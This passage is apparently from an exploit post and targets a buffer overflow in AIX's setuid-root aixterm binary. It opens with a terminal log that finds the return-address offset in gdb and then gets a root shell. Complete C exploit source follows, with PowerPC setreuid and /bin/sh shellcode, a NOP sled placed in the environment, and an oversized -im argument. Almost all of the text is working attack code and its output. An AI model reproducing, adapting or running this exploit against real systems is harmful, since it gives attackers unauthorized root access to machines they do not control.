[dragory@aix dragory]$ ./test -display x.x.x.x:0 -im `perl -
e 'print "x"x400'`
Segmentation fault (core dumped)
[dragory@aix dragory]$ gdb -q test core
(no debugging symbols found)...Core was generated by `test'.
Program terminated with signal 11, Segmentation fault.
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...#0
0x78787878 in ?? () from (unknown load module)
(gdb) q
[dragory@aix dragory]$ ./test -display x.x.x.x:0 -im a`perl -
e 'print "abcd"x100'`
[dragory@aix dragory]$ gdb -q test core
(no debugging symbols found)...Core was generated by `test'.
Program terminated with signal 11, Segmentation fault.
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...#0
0x63646160 in ?? () from (unknown load module)
(gdb) q
[dragory@aix dragory]$ ./test -display x.x.x.x:0 -im ab`perl -
e 'print "abcd"x100'`
[dragory@aix dragory]$ gdb -q test core
(no debugging symbols found)...Core was generated by `test'.
Program terminated with signal 11, Segmentation fault.
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...#0
0x62636460 in ?? () from (unknown load module)
(gdb) q
[dragory@aix dragory]$ ./test -display x.x.x.x:0 -im abc`perl -
e 'print "abcd"x100'`
[dragory@aix dragory]$ gdb -q test core
(no debugging symbols found)...Core was generated by `test'.
Program terminated with signal 11, Segmentation fault.
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...#0
0x61626364 in ?? () from (unknown load module)
(gdb) q
//ADR_ALLIGN = 3
[dragory@aix dragory]$ uname
AIX
[dragory@aix dragory]$ ls -l /usr/bin/X11/aixterm
-rwsr-xr-x 1 root system 376096 7월 20 1999 /usr/bin/X11/aixterm
[dragory@aix dragory]$ id
uid=218(dragory) gid=1(staff)
[dragory@aix dragory]$ gcc -o aixterm_exp aixterm_exp.c
[dragory@aix dragory]$ ./aixterm_exp -d X.X.X.X:0
# id
uid=218(dragory) gid=1(staff) euid=0(root)
#
The vulnerability was discovered by Euan Briggs.
exploited by dragory.
*/
//Original script is written by green
#include <stdio.h>
#include <unistd.h>
#define ADRNUM 1000
#define NOPNUM 16000
#define ADR_ALLIGN 3
#define ALLIGN 0
#define HOST_IP "1.1.1.1:0"
char setreuidcode[]=
"\x7e\x94\xa2\x79\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40"
"\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6"
"\x4c\xc6\x33\x42\x44\xff\xff\x02\x92\x03\xff\xff\x38\x75\xff\x04"
"\x38\x95\xff\x0c\x7e\x85\xa3\x78\x90\x75\xff\x0c\x92\x95\xff\x10"
"\x88\x55\xfe\xe1\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh";
//This shellcode is used in AIX 4.3.x
char nop[]="\x7f\xff\xfb\x78";
main(int argc,char **argv,char **e) {
char buffer[3000],egg[20000],adr[4],*b,*envp[2], host_ip[] = HOST_IP;
int i, opt, adr_allign = ADR_ALLIGN, allign = ALLIGN;
if(argc < 2)
{
usage(argv[0]);
exit(0);
}
while((opt = getopt(argc, argv, "d:a:A:")) != -1)
{
switch(opt)
{
case 'd':
strcpy(host_ip, optarg);
break;
case 'a':
adr_allign = atoi(optarg);
break;
case 'A':
allign = atoi(optarg);
break;
case '?':
usage(argv[0]);
exit(0);
}
}
i=0; while(*e++) i+=strlen(*e)+1;
*((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000; //http://lsd-
pl.net
envp[0]=egg;
envp[1]=0;
b=buffer;
for(i=0;i<adr_allign;i++) *b++=adr[i%4];
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
*b=0;
b=egg;
sprintf(b,"xxx=");b+=4;
for(i=0; i<allign;i++) *b++=' ';
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
*b=0;
execle("/usr/bin/X11/aixterm", "aixterm", "-display", host_ip, "-im",
buffer, 0, envp);
}
usage(char *arg) {
printf("Usage : %s -d [Your X Server IP:0] -a [ADR_ALLIGN] -A [ALLIGN]
\n", arg);
printf("Default : [Your X Server IP:0]=1.1.1.1:0 ADR_ALLIGN=3 ALLIGN=0
\n");
printf("If not exploited, you may modify ALLIGN, Your X Server IP\n");
}
[ reply ]